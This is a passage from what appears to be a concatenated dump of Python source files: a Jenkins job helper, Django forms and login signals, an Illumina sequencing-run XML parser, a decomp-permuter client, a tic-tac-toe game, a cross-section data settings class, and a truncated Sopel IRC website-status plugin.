return [param['name'] for param in self.get_params()]
def has_params(self):
"""
If job has parameters, returns True, else False
"""
if any("parameterDefinitions" in a for a in (self._data["actions"])
if a):
return True
if any("parameterDefinitions" in a for a in (self._data["property"])
if a):
return True
return False
def has_queued_build(self, build_params):
"""
Returns True if a build with build_params is currently queued.
"""
queue = self.jenkins.get_queue()
queued_builds = queue.get_queue_items_for_job(self.name)
for build in queued_builds:
if build.get_parameters() == build_params:
return True
return False
@staticmethod
def get_full_name_from_url_and_baseurl(url, baseurl):
"""
Get the full name for a job (including parent folders) from the
job URL.
"""
path = url.replace(baseurl, '')
split = path.split('/')
split = [urlparse.unquote(part) for part in split[::2] if part]
return '/'.join(split)
def get_full_name(self):
"""
Get the full name for a job (including parent folders)
from the job URL.
"""
return Job.get_full_name_from_url_and_baseurl(
self.url, self.jenkins.baseurl)
def toggle_keep_build(self, build_number):
self.get_build(build_number).toggle_keep()
|
py | 1a3440ef657627d6d0db45e06528d64745c3859d | from typing import Tuple
from django import forms
from . import models
class CreateAnalysisForm(forms.ModelForm):
class Meta:
model = models.Analysis
fields: Tuple[str, ...] = ()
def save(self, commit=True):
self.instance.inputs = self.instance.default_input()
return super().save(commit=commit)
|
py | 1a344157e7a9af2b806e2057ab69394907f84fae | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# InteropDataset
# Library encapsulating the XML and bin files from MiSeq and HiSeq output.
#
# InteropMetadata
# Parser for XML files from MiSeq / HiSeq run data.
#
# See README for intro and basic examples.
#
# March 2013
# by nthmost ([email protected])
# with lots of help from ECO ([email protected])
import os
from collections import OrderedDict
from datetime import datetime
import xml.etree.ElementTree as ET
import xmltodict
from .utils import select_file_from_aliases
from .filemaps import XML_FILEMAP
class InteropMetadata(object):
"""Parser for sequencer's XML files describing a single run. Supply with directory to instantiate.
CHANGES:
0.3 (in progress) Switching to xmltodict from ElementTree.
0.2.2 runParameters supports both MiSeq and HiSeq formats.
0.2.1 No longer prioritizing CompletedJobInfo.xml (not reliably present).
0.2 Cleaner logical process for using the various XML files. No longer throws exceptions.
0.1 First released version.
"""
__version = 0.3 # version of this parser.
def __init__(self, xmldir):
"""Takes the absolute path of a sequencing run data directory as sole required variable.
Attempts to parse CompletedJobInfo.xml (or viable alias). If not available, uses
runParameters.xml and/or runInfo.xml, which have some overlapping info (but not all).
Individual parsers can be explicitly called via their respective methods.
Be aware that parsing methods are DESTRUCTIVE to existing instance data."""
self.xmldir = xmldir
self.experiment_name = "" # "RU1453:::/locus/data/run_data//1337/1453"
self.investigator_name = "" # "Locus:::Uncle_Jesse - 612 - MiSeq"
self.runID = "" # cf CompletedJobInfo.xml / RTARunInfo / Run param "Id"
# TODO: xml_datetimes
# We can learn end_datetime this from the RTAComplete.txt file.
# sample: 2/11/2014,17:25:13.217,Illumina RTA 1.18.42
#
#...but it would be nicer if we didn't have to (more files to track, no fun).
self.start_datetime = None
self.end_datetime = None
self.rta_run_info = { 'flowcell': '', 'instrument': '', 'date': '' }
# read_config: a list of dictionaries, each of which describe a single read from the sequencer.
self.read_config = []
# Flow cell layout: necessary to enable parsing of different machine types' binaries.
self.flowcell_layout = { }
# Read numbers from ResequencingRunStats.xml
# Example: { 'clusters_raw': 19494893, 'clusters_PF': 17381252,
# 'unindexed': 508055, 'unindexed_PF': 16873197,
# 'unaligned': 18572490, 'unaligned_PF': 16973197 }
self.resequencing_stats = {}
if self.get_xml_path('reseqstats') is not None:
self.parse_ResequencingRunStats(self.get_xml_path('reseqstats'))
# The main goal of parsing the XML is to find out read_config and flowcell_layout.
# A lot of other data is available, but only these two basics are necessary.
#
# CompletedJobInfo.xml has the most complete data from MiSeq machines, but only exists
# at the end of a run, and HiSeq machines don't even generate one.
#
# RunInfo.xml (containing just the basics) is always available during an active run.
#
# TODO: xml_flex (proposed improvement allowing a config file to set which tokens are required / not required.)
# Also we might want to specify priority of provenance (e.g. get start_datetime from 'runparams' first).
# If you (yes YOU) have any opinions about this, please email me: [email protected]
self.machine_id = ""
self.model = ""
self._xml_map = OrderedDict({ 'completed': [None, self.parse_CompletedJobInfo],
'runinfo': [None, self.parse_RunInfo],
'runparams': [None, self.parse_RunParameters] })
self._set_xml_map()
# cycle through XML files, filling from what's available.
for codename in self._xml_map:
if self._xml_map[codename][0] is not None:
self._xml_map[codename][1](self._xml_map[codename][0])
if codename == 'completed':
break
def _set_xml_map(self):
"""finds all available XML files, assigns them to an ordered dictionary
mapping of codename:[filepath,parse_function] """
for codename in self._xml_map:
self._xml_map[codename][0] = self.get_xml_path(codename)
def get_xml_path(self, codename):
"returns absolute path to XML file represented by data 'codename' or None if not available."
result = select_file_from_aliases(codename, XML_FILEMAP, self.xmldir)
return result
def parse_Run_ET(self, run_ET):
"parses chunk of XML associated with the RTA Run Info blocks in (at least) 2 xml files."
self.rta_run_info = { 'instrument': run_ET.find('Instrument').text, # M00612
'flowcell': run_ET.find('Flowcell').text, # 000000000-A316T
'date': run_ET.find('Date').text } # 130208
flowcell_ET = run_ET.find('FlowcellLayout')
self.flowcell_layout = { 'lanecount': int(flowcell_ET.attrib['LaneCount']),
'surfacecount': int(flowcell_ET.attrib['SurfaceCount']),
'swathcount': int(flowcell_ET.attrib['SwathCount']),
'tilecount': int(flowcell_ET.attrib['TileCount']) }
# Run / Reads - describes number of cycles per read (and if read is an Index) in sequencing run.
# Because parsing is understood to be destructive, and Reads can be found in multiple files,
# we start by emptying out whatever's currently in the read_config array for this instance.
self.read_config = []
read_num = 0
for item in run_ET.find("Reads"):
read_num += 1 # redundant safety assignment to read_num
self.read_config.append( {'read_num': read_num,
'cycles': int(item.attrib['NumCycles']),
'is_index': True if item.attrib['IsIndexedRead']=='Y' else False } )
def parse_ResequencingRunStats(self, filepath):
"""Parses ResequencingRunStatistics.xml (or viable alias) to fill instance variables."""
# TODO: xmltodict conversion
tree = ET.parse(filepath)
root = tree.getroot() # should be "StatisticsResequencing"
runstats_ET = root.find("RunStats")
self.resequencing_stats = { 'clusters_raw': int(runstats_ET.find('NumberOfClustersRaw').text),
'clusters_pf': int(runstats_ET.find('NumberOfClustersPF').text),
'unindexed': int(runstats_ET.find('NumberOfUnindexedClusters').text),
'unindexed_pf': int(runstats_ET.find('NumberOfUnindexedClustersPF').text),
'unaligned': int(runstats_ET.find('NumberOfUnalignedClusters').text),
'unaligned_pf': int(runstats_ET.find('NumberOfUnalignedClustersPF').text),
'duplicate': int(runstats_ET.find('NumberOfDuplicateClusters').text) }
def parse_RunInfo(self, filepath):
"parses Reads, Date, Flowcell, Instrument out of runInfo.xml"
#buf = open(filepath).read()
#root = xmltodict.parse(buf)['RunInfo']
tree = ET.parse(filepath)
run_ET = tree.getroot().find('Run') #little of use in this file except <Run> subelement.
self.runID = run_ET.attrib['Id']
#? is runNumber useful information? if so, what for?
#self.runNumber = run_ET.attrib['Number']
self.parse_Run_ET(run_ET)
if not self.read_config:
buf = open(filepath).read()
root = xmltodict.parse(buf)['RunInfo']
try:
Reads = root.get('Run')['Reads']['Read']
except KeyError:
pass
for read in Reads:
self.read_config.append(
{'read_num': int(read['@Number']),
'cycles': int(read['@NumCycles']),
'is_index': True if read['@IsIndexedRead'] == 'Y' else False
})
def _parse_runparams(self, xml_dict):
# Different format from that in CompletedJobInfo.xml (contains read Number).
# And there are two possible keys to indicate the same datastructure. So fun.
try:
Reads = xml_dict.get('Reads')['Read']
except KeyError:
Reads = xml_dict.get('Reads')['RunInfoRead']
if not self.read_config:
for read in Reads:
self.read_config.append(
{'read_num': int(read['@Number']),
'cycles': int(read['@NumCycles']),
'is_index': True if read['@IsIndexedRead']=='Y' else False
} )
self.rta_version = xml_dict.get('RTAVersion', '')
rawdate = xml_dict.get('RunStartDate', '') # format: 130208 YYMMDD
if rawdate:
self.start_datetime = datetime.strptime(rawdate, '%y%m%d')
self.runID = xml_dict.get('RunID', '')
self.experiment_name = xml_dict.get('ExperimentName', '')
self.flowcell_position = xml_dict.get('FCPosition', '')
self.flowcell_barcode = xml_dict.get('Barcode', '')
self.machine_id = xml_dict.get('ScannerID', '')
def parse_RunParameters(self, filepath):
"""parses runParameters.xml (or viable alias) to fill instance variables.
Need to implement further since HiSeq output has no CompletedJobInfo.xml
"""
buf = open(filepath).read()
root = xmltodict.parse(buf)['RunParameters']
# a dirty hack to figure out which version of this file we're reading.
if 'Reads' in list(root['Setup'].keys()):
self._parse_runparams(root['Setup']) # HiSeq
elif 'Reads' in list(root.keys()):
self._parse_runparams(root) # MiSeq
else:
pass # NextSeq
self.model = self._get_model()
def parse_CompletedJobInfo(self, filepath):
"""parses CompletedJobInfo.xml (or viable alias) to fill instance variables.
Not all machines generate this file, so we avoid relying on it.
"""
# TODO: xmltodict conversion
# comments show example data from a real MiSeq run (2013/02)
tree = ET.parse(filepath)
root = tree.getroot() #should be "AnalysisJobInfo"
# Something to be aware of: RTARunInfo contains a "version" attribute.
# (This parser knows how to deal with version 2.)
self.rta_version = root.find("RTARunInfo").attrib['Version']
# original location of data output from the sequencer.
self.output_folder = root.find("RTAOutputFolder").text
# TODO: xml_datetimes
self.start_datetime = root.find("StartTime").text # 2013-02-09T15:51:50.0811937-08:00
self.end_datetime = root.find("CompletionTime").text # 2013-02-09T16:06:44.0124452-08:00
# dechunk all of the major sections we want to extract data from.
sheet_ET = root.find("Sheet")
header_ET = sheet_ET.find("Header")
run_ET = root.find("RTARunInfo").find("Run")
# Sheet / *
# TODO: deprecate this attribute (can't get it from HiSeq XML)
try:
self.runtype = sheet_ET.find("Type").text # MiSeq, HiSeq, etc.
except AttributeError:
#older (early 2012) XML files have no "Type" token.
self.runtype = ""
# Sheet / Header / *
try:
self.investigator_name = header_ET.find("InvestigatorName").text
self.project_name = header_ET.find("ProjectName").text
self.experiment_name = header_ET.find("ExperimentName").text
except AttributeError:
pass
# RTARunInfo / Run / *
self.runID = run_ET.attrib["Id"]
self.parse_Run_ET(run_ET)
def _get_model(self):
"""
Guesses the sequencer model from the run folder name
Current Naming schema for Illumina run folders, as far as I know,
no documentation found on this, Illumina introduced a field called
'InstrumentID' on the NextSeq runParameters.xml. That might be an
option for the future
MiSeq: 150130_M01761_0114_000000000-ACUR0
NextSeq: 150202_NS500318_0047_AH3KLMBGXX
HiSeq 2000: 130919_SN792_0281_BD2CHRACXX
HiSeq 2500: 150203_D00535_0052_AC66RWANXX
HiSeq 4000: 150210_K00111_0013_AH2372BBXX
HiSeq X: 141121_ST-E00107_0356_AH00C3CCXX
"""
# retired this line. getting self.machine_id from ScannerID field in _parse_runparams()
# date, machine_id, run_number, fc_string = os.path.basename(self.runID).split("_")
if self.machine_id.startswith("NS"):
model = "NextSeq 500"
elif self.machine_id.startswith("M"):
model = "MiSeq"
elif self.machine_id.startswith("D"):
model = "HiSeq 2500"
elif self.machine_id.startswith("SN"):
model = "HiSeq 2000"
# elif machine_id.startswith("??"):
# model = "Hiseq 3000"
elif self.machine_id.startswith("K"):
model = "HiSeq 4000"
elif self.machine_id.startswith("ST"):
model = "HiSeq X"
else:
model = "Unidentified"
return model
def prettyprint_general(self):
out = "General Config:\n" + \
"Model: " + self.model + "\n" + \
"Run Folder Name: " + os.path.basename(self.runID)
return out
def prettyprint_read_config(self):
out = "Read Config:"
for read in self.read_config:
out += " Read %i: %i cycles %s" % (read['read_num'], read['cycles'],
"(Index)" if read['is_index'] else "")
return out
def prettyprint_flowcell_layout(self):
out = """Flowcell Layout:
Tiles: %(tilecount)i
Lanes: %(lanecount)i
Surfaces: %(surfacecount)i
Swaths: %(swathcount)i""" % self.flowcell_layout
return out
def __str__(self):
"""
Print the most important metadata
"""
out = self.prettyprint_general() + "\n"
out += self.prettyprint_read_config() + "\n"
out += self.prettyprint_flowcell_layout() + "\n"
return out
def to_dict(self):
return { 'runID': self.runID,
'experiment_name': self.experiment_name,
'start_datetime': self.start_datetime,
'end_datetime': self.end_datetime,
'model': self.model,
'flowcell_layout': self.flowcell_layout,
'flowcell_barcode': self.flowcell_barcode,
'flowcell_position': self.flowcell_position, }
|
py | 1a3442c325cc8c459cb85e674f979dfa57b3f123 | from multiprocessing import Queue
import re
import threading
from typing import Optional, Tuple
import zlib
from ..candidate import CandidateResult
from ..helpers import exception_to_string
from ..permuter import (
EvalError,
EvalResult,
Feedback,
FeedbackItem,
Finished,
Message,
NeedMoreWork,
Permuter,
Task,
WorkDone,
)
from ..profiler import Profiler
from .core import (
PermuterData,
SocketPort,
json_prop,
permuter_data_to_json,
)
def _profiler_from_json(obj: dict) -> Profiler:
ret = Profiler()
for key in obj:
assert isinstance(key, str), "json properties are strings"
stat = Profiler.StatType[key]
time = json_prop(obj, key, float)
ret.add_stat(stat, time)
return ret
def _result_from_json(obj: dict, source: Optional[str]) -> EvalResult:
if "error" in obj:
return EvalError(exc_str=json_prop(obj, "error", str), seed=None)
profiler: Optional[Profiler] = None
if "profiler" in obj:
profiler = _profiler_from_json(json_prop(obj, "profiler", dict))
return CandidateResult(
score=json_prop(obj, "score", int),
hash=json_prop(obj, "hash", str) if "hash" in obj else None,
source=source,
profiler=profiler,
)
def _make_script_portable(source: str) -> str:
"""Parse a shell script and get rid of the machine-specific parts that
import.py introduces. The resulting script must be run in an environment
that has the right binaries in its $PATH, and with a current working
directory similar to where import.py found its target's make root."""
lines = []
for line in source.split("\n"):
if re.match("cd '?/", line):
# Skip cd's to absolute directory paths. Note that shlex quotes
# its argument with ' if it contains spaces/single quotes.
continue
if re.match("'?/", line):
quote = "'" if line[0] == "'" else ""
ind = line.find(quote + " ")
if ind == -1:
ind = len(line)
else:
ind += len(quote)
lastind = line.rfind("/", 0, ind)
assert lastind != -1
# Emit a call to "which" as the first part, to ensure the called
# binary still sees an absolute path. qemu-irix requires this,
# for some reason.
line = "$(which " + quote + line[lastind + 1 : ind] + ")" + line[ind:]
lines.append(line)
return "\n".join(lines)
def make_portable_permuter(permuter: Permuter) -> PermuterData:
with open(permuter.scorer.target_o, "rb") as f:
target_o_bin = f.read()
with open(permuter.compiler.compile_cmd, "r") as f2:
compile_script = _make_script_portable(f2.read())
return PermuterData(
base_score=permuter.base_score,
base_hash=permuter.base_hash,
fn_name=permuter.fn_name,
filename=permuter.source_file,
keep_prob=permuter.keep_prob,
need_profiler=permuter.need_profiler,
stack_differences=permuter.scorer.stack_differences,
compile_script=compile_script,
source=permuter.source,
target_o_bin=target_o_bin,
)
class Connection:
_port: SocketPort
_permuter_data: PermuterData
_perm_index: int
_task_queue: "Queue[Task]"
_feedback_queue: "Queue[Feedback]"
def __init__(
self,
port: SocketPort,
permuter_data: PermuterData,
perm_index: int,
task_queue: "Queue[Task]",
feedback_queue: "Queue[Feedback]",
) -> None:
self._port = port
self._permuter_data = permuter_data
self._perm_index = perm_index
self._task_queue = task_queue
self._feedback_queue = feedback_queue
def _send_permuter(self) -> None:
data = self._permuter_data
self._port.send_json(permuter_data_to_json(data))
self._port.send(zlib.compress(data.source.encode("utf-8")))
self._port.send(zlib.compress(data.target_o_bin))
def _feedback(self, feedback: FeedbackItem, server_nick: Optional[str]) -> None:
self._feedback_queue.put((feedback, self._perm_index, server_nick))
def _receive_one(self) -> bool:
"""Receive a result/progress message and send it on. Returns true if
more work should be requested."""
msg = self._port.receive_json()
msg_type = json_prop(msg, "type", str)
if msg_type == "need_work":
return True
server_nick = json_prop(msg, "server", str)
if msg_type == "init_done":
base_hash = json_prop(msg, "hash", str)
my_base_hash = self._permuter_data.base_hash
text = "connected"
if base_hash != my_base_hash:
text += " (note: mismatching hash)"
self._feedback(Message(text), server_nick)
return True
if msg_type == "init_failed":
text = "failed to initialize: " + json_prop(msg, "reason", str)
self._feedback(Message(text), server_nick)
return False
if msg_type == "disconnect":
self._feedback(Message("disconnected"), server_nick)
return False
if msg_type == "result":
source: Optional[str] = None
if msg.get("has_source") == True:
# Source is sent separately, compressed, since it can be
# large (hundreds of kilobytes is not uncommon).
compressed_source = self._port.receive()
try:
source = zlib.decompress(compressed_source).decode("utf-8")
except Exception as e:
text = "failed to decompress: " + exception_to_string(e)
self._feedback(Message(text), server_nick)
return True
try:
result = _result_from_json(msg, source)
self._feedback(WorkDone(self._perm_index, result), server_nick)
except Exception as e:
text = "failed to parse result message: " + exception_to_string(e)
self._feedback(Message(text), server_nick)
return True
raise ValueError(f"Invalid message type {msg_type}")
def run(self) -> None:
finish_reason: Optional[str] = None
try:
self._send_permuter()
self._port.receive_json()
finished = False
# Main loop: send messages from the queue on to the server, and
# vice versa. Currently we are being lazy and alternate between
# sending and receiving; this is nicely simple and keeps us on a
# single thread, however it could cause deadlocks if the server
# receiver stops reading because we aren't reading fast enough.
while True:
if not self._receive_one():
continue
self._feedback(NeedMoreWork(), None)
# Read a task and send it on, unless there are no more tasks.
if not finished:
task = self._task_queue.get()
if isinstance(task, Finished):
# We don't have a way of indicating to the server that
# all is done: the server currently doesn't track
# outstanding work so it doesn't know when to close
# the connection. (Even with this fixed we'll have the
# problem that servers may disconnect, losing work, so
# the task never truly finishes. But it might work well
# enough in practice.)
finished = True
else:
work = {
"type": "work",
"work": {
"seed": task[1],
},
}
self._port.send_json(work)
except EOFError:
finish_reason = "disconnected from permuter@home"
except Exception as e:
errmsg = exception_to_string(e)
finish_reason = f"permuter@home error: {errmsg}"
finally:
self._feedback(Finished(reason=finish_reason), None)
self._port.shutdown()
self._port.close()
def start_client(
port: SocketPort,
permuter: Permuter,
perm_index: int,
feedback_queue: "Queue[Feedback]",
priority: float,
) -> "Tuple[threading.Thread, Queue[Task], Tuple[int, int, float]]":
port.send_json(
{
"method": "connect_client",
"priority": priority,
}
)
obj = port.receive_json()
if "error" in obj:
err = json_prop(obj, "error", str)
# TODO use another exception type
raise Exception(f"Failed to connect: {err}")
num_servers = json_prop(obj, "servers", int)
num_clients = json_prop(obj, "clients", int)
num_cores = json_prop(obj, "cores", float)
permuter_data = make_portable_permuter(permuter)
task_queue: "Queue[Task]" = Queue()
conn = Connection(
port,
permuter_data,
perm_index,
task_queue,
feedback_queue,
)
thread = threading.Thread(target=conn.run, daemon=True)
thread.start()
stats = (num_clients, num_servers, num_cores)
return thread, task_queue, stats
|
py | 1a344461938d13d114c5d232eec54156ccc6cfa8 | # TIC TAC TOE Minmax algorithm
'''
1. Backtracking algorithm
2. Max wiil try to maximize it utility
3. Min will try to minimize user or human utility to win
4. Time complexity : O(b^d)
b : branching factor (choices, number of possible move)
d : depth
'''
# Format colour
import random
bright_cyan = "\033[0;96m"
# import package
board = [' ' for i in range(10)]
def insertLetter(letter, pos):
'''
insert either 'O' or 'X' at perticular position
'''
board[pos] = letter
def spaceIsFree(pos):
'''
Boolean : Check whether their is any empty position is present or not in the board
'''
return board[pos] == ' '
def printBoard(board):
'''
Display the board
'''
# "board" is a list of 10 strings representing the board (ignore index 0)
print(' | |')
print(' ' + board[1] + ' | ' + board[2] + ' | ' + board[3])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(' | |')
def isWinner(board, letter):
'''
Boolean : check whether winning criteria met or not
'''
# condition of horizontal, vertical, diagonal
return (board[1] == letter and board[2] == letter and board[3] == letter) or \
(board[4] == letter and board[5] == letter and board[6] == letter) or \
(board[7] == letter and board[8] == letter and board[9] == letter) or \
(board[1] == letter and board[4] == letter and board[7] == letter) or \
(board[2] == letter and board[5] == letter and board[8] == letter) or \
(board[3] == letter and board[6] == letter and board[9] == letter) or \
(board[1] == letter and board[5] == letter and board[9] == letter) or \
(board[3] == letter and board[5] == letter and board[7] == letter)
def playerMove():
'''
Take the input from user and validate user's input
'''
run = True
while run:
try:
move = int(input("Select a position to place \'X\' (1-9) : "))
if isinstance(move, str):
print("Please enter the valid number 😏")
if move > 0 and move < 10:
if spaceIsFree(move):
run = False
insertLetter('X', move)
else:
print("Position is already occupied 😳")
else:
print("Please enter valid position within the valid range 😏")
except:
print("Please enter the valid number 😏")
def compMove():
'''
Function decide computer's moves i.e where to place 'O' , so that it win
'''
# 1. winning move
# 2. Block move ,if human gets benefited
# 3. move at corner
# 4. move at center
# 5. move at any edge
possibleMove = [
x for x, letter in enumerate(board) if letter == ' ' and x != 0
]
move = 0
# 1st way -> To check whether computer can win or not , if not then
# computer now tries to block opponent move, so that he could not win
for let in ['O', 'X']:
for i in possibleMove:
# replica of board
boardCopy = board[:]
boardCopy[i] = let
if isWinner(boardCopy, let):
move = i
return move
if board[1] == 'X' or board[3] == 'X' or board[7] == 'X' or board[9] == 'X':
if 5 in possibleMove:
move = 5
return move
edgesOpen = []
if (board[1] == 'X' and board[9] == 'X') or (board[3] == 'X'
and board[7] == 'X'):
for i in possibleMove:
if i in [2, 4, 6, 8]:
edgesOpen.append(i)
# randomly select a corner to move Into
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
# Same code repeat for edges also
cornersOpen = []
# Check whether there is any corner is empty if find empty then we place
# letter in that corner position
for i in possibleMove:
if i in [1, 3, 7, 9]:
cornersOpen.append(i)
# randomly select a corner to move Into
if len(cornersOpen) > 0:
move = selectRandom(cornersOpen)
return move
# Place letter at center pow
if 5 in possibleMove:
move = 5
return move
# Check whether there is any edge is empty if find empty then we place
# letter in that edge position
for i in possibleMove:
if i in [2, 4, 6, 8]:
edgesOpen.append(i)
# randomly select a corner to move Into
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
def selectRandom(li):
return random.choice(li)
def isBoardFull(board):
if board.count(' ') > 1:
return False
else:
return True
# Human = 'X'
# Bot = 'O'
def main():
'''
Main function
'''
print(bright_cyan +
"# ----------- Welcome to TIC TAC TOE ------------- #")
name = input("Enter your name : ")
print("👲 {} : \'X\' and 🤖 Computer : \'O\' ".format(name.capitalize()))
print()
printBoard(board)
while not (isBoardFull(board)):
if not isWinner(board, 'O'):
playerMove() # Ask player for next move
printBoard(board) # print board
else:
print("\nOOPS O\'s won the game 😞 !!")
break
if not isWinner(board, 'X'):
move = compMove() # Ask computer for next move
if move == 0:
print('Tie game !!')
else:
insertLetter('O', move)
print("Computer enter \'O\' at Position : {}".format(move))
printBoard(board) # print board
else:
print("\nYeah X\'s won the game 😎 !!")
break
if isBoardFull(board):
print("Game over !!")
main()
while True:
print()
ans = input("Do want to play again 😀 ... ? (Y|N) : ")
print() # next line
if ans.lower() == 'y' and ans.upper() == 'Y':
board = [' ' for i in range(10)]
main()
else:
break
|
py | 1a344596357aea908122f211908ad470915288e0 | from django.apps import AppConfig
from django.db.models.signals import post_migrate
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.signals import user_logged_in
def add_cart_wish(sender, user, request, **kwargs):
from products.models import Cart, WishList
if request.session.exists(request.session.session_key):
cart_session = Cart.objects.filter(session_key=request.session.session_key)
wish_session = WishList.objects.filter(session_key=request.session.session_key)
cart = Cart.objects.filter(user=user)
wish = WishList.objects.filter(user=user)
if cart_session:
cart_session = cart_session.first()
if cart and cart.first().products.count() > 0:
cart = cart.first()
plist = []
for p in cart.products.all():
plist.append(p.product)
for p in cart_session.products.all():
if p.product not in plist:
p.cart = cart
p.save()
cart_session.delete()
else:
if cart:
cart.first().delete()
cart_session.user = user
cart_session.session_key = None
cart_session.save()
if wish_session:
wish_session = wish_session.first()
if wish and wish.first().products.count() > 0:
wish = wish.first()
for p in wish_session.products.all():
if p not in wish.products.all():
wish.products.add(p)
wish.save()
wish_session.delete()
else:
if wish:
wish.first().delete()
wish_session.user = user
wish_session.session_key = None
wish_session.save()
def add_site_info(sender, **kwargs):
from .models import SiteInfo
try:
info = SiteInfo.objects.all().first()
except ObjectDoesNotExist:
info = None
if info is None:
info = SiteInfo(
name='name',
name_ar='name_ar',
address='address',
address_ar='address_ar',
email='[email protected]',
phone='0123456789',
facebook='www.facebook.com',
twitter='www.twitter.com',
instagram='www.instagram.com',
linkedin='www.linkedin.com'
)
info.save()
class AccountsConfig(AppConfig):
name = 'accounts'
def ready(self):
post_migrate.connect(add_site_info, sender=self)
user_logged_in.connect(add_cart_wish)
|
py | 1a3446520d0787ec9e8ea4fb3d2de7f73b9dc633 | # -*- coding: utf-8 -*-
"""datasettings.py
The user needs to define the required data to be stored on the containers.
This container stores all the attributes and settings for the required data.
Created on Sat Mar 19 18:30:00 2022 @author: Dan Kotlyar and Bailey Painter
Last updated on Tue Apr 01 11:30:00 2022 @author: Dan Kotlyar
email: [email protected]
"""
import numpy as np
from xsInterface.errors.checkerrors import _isint, _islist, _isbool, _inlist,\
_ispositive, _isstr, _isuniquelist, _isarray,\
_is1darray, _isequallength, _isBoundArray
from xsInterface.containers.container_header import DATA_TYPES
class DataSettings():
"""
Stores the names and data that are expected to be stored on containers
Parameters
-----------
NG : int
number of energy groups for multi-group parameters
DN : int
Delayed neutron groups for kinetic parameters
macro : boolean
indicate whether macro data is expected to be provided
micro : boolean
indicate whether micro data is expected to be provided
kinetics : boolean
indicate whether kinetic data is expected to be provided
meta : boolean
indicate whether meta data is expected to be provided
isotopes : array
ZZAAA0/1 for all the isotopes to be provided
Attributes
-----------
NG : int
number of energy groups for multi-group parameters
DN : int
delayed neutron groups for kinetic parameters
dataFlags : dict
boolean flags to indicate the data types that are provided
macro : dict
contains all the macro attributes (e.g., ``abs``)
micro : boolean
contains all the micro attributes for all the isotopes (e.g., ``fiss``)
kinetics : boolean
contains all the kinetic attributes (e.g., ``beta``)
meta : boolean
contains all the metadata attributes (e.g., ``time``)
Methods
--------
AddData(dataType, attributes, attrDims=None):
Add relevant macroscopic/microscopic/meta data
Raises
-------
TypeError
If any of the parameters, e.g., ``NG``, ``DN`` are not integers.
If any of the ``macro``, ``micro``, ``kinetics``, ``meta``
are not booleans.
ValueError
If ``NG`` is below one.
If ``DN`` is below one.
If ``isotopes`` list is not provided but ``micro`` data is expected.
KeyError
If ``dataType`` or ``frmt`` do not exist in DATA_TYPES or FRMT_OPTS.
Examples
---------
>>> rc = DataSettings(NG=2, DN=7, macro=True, micro=False, kinetics=True,
>>> meta=False, isotopes=None)
"""
def __init__(self, NG, DN, macro=True, micro=False, kinetics=False,
meta=False, isotopes=None):
"""Assign parameters that describe the required data to be provided"""
# Check variables types
_isint(NG, "number of energy groups")
_isint(DN, "number of delayed neutron groups")
_isbool(macro, "macro data")
_isbool(micro, "micro data")
_isbool(kinetics, "kinetics data")
_isbool(meta, "meta data")
# Check values/entries for different variables
_ispositive(NG, "number of energy groups")
_ispositive(DN, "number of delayed neutron groups")
if micro:
if isotopes is not None:
isotopes = np.array(isotopes, dtype=int)
else:
raise ValueError("<isotopes> list/array must be provided")
# Reset variables
self.ng = NG # number of energy groups
self.dn = DN # number of delayed neutron groups
self.isotopes = isotopes
self.dataFlags = {"macro": macro, "micro": micro,
"kinetics": kinetics, "meta": meta}
self.macro = []
self.micro = []
self.kinetics = []
self.meta = []
def AddData(self, dataType, attributes):
"""Add relevant macroscopic/microscopic/meta data
Parameters
----------
dataType : ["macro", "micro", "kinetics", "meta"]
type of data
attributes : list of strings
user-defined names for the provided data type (e.g., ``abs``)
Examples
--------
>>> rc.AddData("macro", ["abs", "nsf", "sct"], "array")
>>> rc.AddData("kinetics", ["beta", "decay"], "array")
"""
# Error checking
_isstr(dataType, "data types")
_inlist(dataType, "data types", DATA_TYPES)
if not self.dataFlags[dataType]:
raise ValueError("Data type <{}> was disabled when DataSettings "
"object was created".format(dataType))
_islist(attributes, "names of "+dataType+" attributes")
_isuniquelist(attributes, "attribute names in ")
# check if data is already populated
data0 = getattr(self, dataType)
if data0 == []: # data is new
# define the specific dictionary for the selected data type
attrList = attributes
else: # data already exists
attr0 = data0
# create a new/appended list of attributes
attr1 = attr0 + attributes
_isuniquelist(attr1, "attribute names in ")
attrList = attr1
# set a muted attribute with the settings for the selected data type
setattr(self, dataType, attrList)
def _proofTest(self):
"""Check that data was inputted"""
if self.dataFlags["macro"] and self.macro == []:
raise ValueError("macro data is expected to be provided.")
if self.dataFlags["micro"] and self.micro == []:
raise ValueError("micro data is expected to be provided.")
if self.dataFlags["kinetics"] and self.kinetics == []:
raise ValueError("kinetics data is expected to be provided.")
if self.dataFlags["meta"] and self.meta == []:
raise ValueError("meta data is expected to be provided.")
|
py | 1a3446d9a525f0eb30dd7362f75f1e4c76df76a6 | # -*- coding: utf-8 -*-
from sopel import web
from sopel.module import commands
import re
def is_http_url(s):
if re.match('(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,2})(?:/[\w&%?#-]{1,300})?',s):
return True
else:
return False
@commands('isup')
def isup(bot, trigger):
site = trigger.group(2)
if not site:
if bot.config.lang == 'fr':
return bot.reply("Quel website veux-tu que je verifie?")
elif bot.config.lang == 'es':
return bot.reply("Que web quieres que compruebe?")
else:
return bot.reply("What web do you want to check?")
if 'localhost' in site or '127.0.0.1' in site or '0::1' in site:
bot.reply("I'm minding on not say you it.")
return
elif site[:6] != 'http://' and site[:7] != 'https://':
if '://' in site:
protocol = site.split('://')[0] + '://'
if bot.config.lang == 'fr':
return bot.reply("Tournez à tenter sans le %s" % protocol)
elif bot.config.lang == 'es':
return bot.reply("Vuelve a intentar sin el %s" % protocol)
else:
return bot.reply("Try it again without the %s" % protocol)
else:
if is_http_url(site) is False:
return bot.reply("That URL looks not valid for me.")
site = 'http://' + site
try:
response = web.get(site)
except Exception:
if bot.config.lang == 'fr':
bot.say('Sembla que ' + site + ' ne fonctionne pas ou n\'existe pas.')
elif bot.config.lang == 'es':
bot.say('Parece que ' + site + ' no funciona o no existe.')
else:
bot.say(site + ' looks down from here.')
return
if response:
if bot.config.lang == 'fr':
bot.say('Il n\'y a pas d\'aucun problème à ' + site)
elif bot.config.lang == 'es':
bot.say('No veo ningun problema en ' + site)
else:
bot.say(site + ' looks fine to me.')
else:
